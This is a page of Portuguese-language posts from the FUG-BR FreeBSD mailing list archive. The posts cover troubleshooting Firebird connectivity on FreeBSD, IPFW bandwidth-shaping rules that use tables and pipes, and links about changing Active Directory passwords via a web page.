Em 15 de dezembro de 2012 00:05, Luzivan luzi...@gmail.com escreveu: Renny, procura os logs do firebird e cola aqui, vai nos ajudar. Uma coisa q nao entendi é o que tem haver o samba e permissao 777 nas pastaz, n é necessario o samba para fb funcionar. Confirma se o servico ta ouvindo na porta 3050, faz um telnet nesta porta a partir de outro pc da rede, cria um banco de teste e acessa usando um client qualquer. Em 13/12/2012 17:19, Welkson Renny de Medeiros welk...@gmail.com escreveu: Oi Luzivan, beleza? Na verdade quem está com problemas é o Anker projeto (o cara que abriu o tópico). Eu estou tentando ajudar. Confesso que a uns 4 ou 5 anos tentei usar Firebird no FreeBSD e não tive boas experiências (tudo bem que o sistema usava diversas UDF's como rFUNC, etc.)... na época os ports de Firebird eram bastante desatualizados, problemas com semáforos, etc... enfim, pra Firebird eu optei por Linux e roda tranquilo até hoje. Hoje a realidade talvez seja outra, não sei. Eu também não entendi a ideia do 777 no Samba... o Firebird não precisa de Samba. Abraços, Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] Firebird não Comunica
Em 12 de dezembro de 2012 09:10, Anker Projeto projetoan...@gmail.comescreveu: Bom dia galera, ve se vocês podem me ajudar. Instalei o Bsd em uma maquina onde eu so preciso que rode o Firebird25, ja instalei tudo ok , o serviço esta rodando . So que quando chamo o pessoal do sistema para fazer a parte deles não tem jeito de comunicar com o banco . Ja instalei o Samba35 e dei 0777 nas pastas e não tem jeito. Tem que fazer alguma configuração em especial quando instala o firebird? Eu ja troquei o usuario e senha e nada , eu ja li alguma coisa na net e tem o tal do /opt , mas nessa versão 2.5 não criar essa pasta , eu ja fiz alguns testes em outras versões e ele cria. Alguém por favor ? Desde já Agradeço ! #Surra O serviço está rodando? sockstat -4 | grep 3050 Qual a mensagem de erro ? Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] Limite Banda IPFW
Em 1 de novembro de 2012 15:37, Corsini . jbcors...@hotmail.com escreveu: Certo, meu amigo Welkson, entendi certinho, Nesse caso então eu teria que dividir mesmo os ips em cada table, ou seja, para utilizar essas velocidades certo? Agora se eu não colocar todos os ips nessas tables, em qual regra de velocidade ele vai pasar sendo que nas linhas de comando eu tenho 500k e 2000k, ele pega a ultima regra né isso ? Att João B. Corsini Corsini, Desculpe-me pela demora para responder! Tinha várias mensagens novas no FUG e acabei não atentando a essa thread. Eu não estou no trabalho agora, mas na segunda testo com calma e mando mais detalhes pra você... mas pelo que lembro, se o usuário não tiver em nenhuma table ele assume a primeira regra (e nessa não tem referência a table alguma)... no meu caso fica com 400k eu acho. Na segunda vou testar e passo mais detalhes. Abraços, Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] Limite Banda IPFW
Em 31 de outubro de 2012 13:11, Eduardo Schoedler lis...@esds.com.brescreveu: Uma depois da outra, quando fizer o match ele fará o shaping. Corsini, Exemplo rápido: # se usuario for da table2, saltar para regra 600 (ADMINISTRACAO) ipfw 10 add skipto 600 all from any to table(2) # se usuario for da table4, saltar para regra 800 (TURBO) ipfw 11 add skipto 800 all from any to table(4) # usuarios administracao - 500kbps (alterei de from any para from not 192...) ipfw pipe 12 config bw 500Kbit/s mask dst-ip 0x ipfw 600 add pipe 12 ip from not me to 192.168.0.0/24 not src-port 5432,445,139, 2,3389,4899,5900,5800 out via vr0 # usuarios TURBO ipfw pipe 14 config bw 2000Kbit/s mask dst-ip 0x ipfw 800 add pipe 14 ip from not me to 192.168.0.0/24 not src-port 5432,445,139, 2,3389,4899,5800,5900 out via vr0 As regras tem algumas exceções (SSH, TS, Radmin, etc), mas dá pra aproveitar. Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] [Off-Topic] - Troca de senha do AD via web
Em 25 de outubro de 2012 23:10, Rogério Moura roger...@gmail.com escreveu: Uma alternativa seria fazer um Jscript Em 24 de outubro de 2012 23:21, Christiano Liberato christianoliber...@gmail.com escreveu: Rogerio, no 2008 nao tem mais o IISADMPWD. Senhores, http://jsaaby.wordpress.com/2009/12/02/iisadmpwd-on-server-2008-x64-and-iis7-change-user-domain-password-via-a-webpage/ http://blogs.msdn.com/b/asiatech/archive/2009/03/17/how-to-manage-my-windows-user-password-through-iis-web-portal.aspx Isso não ajuda? Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd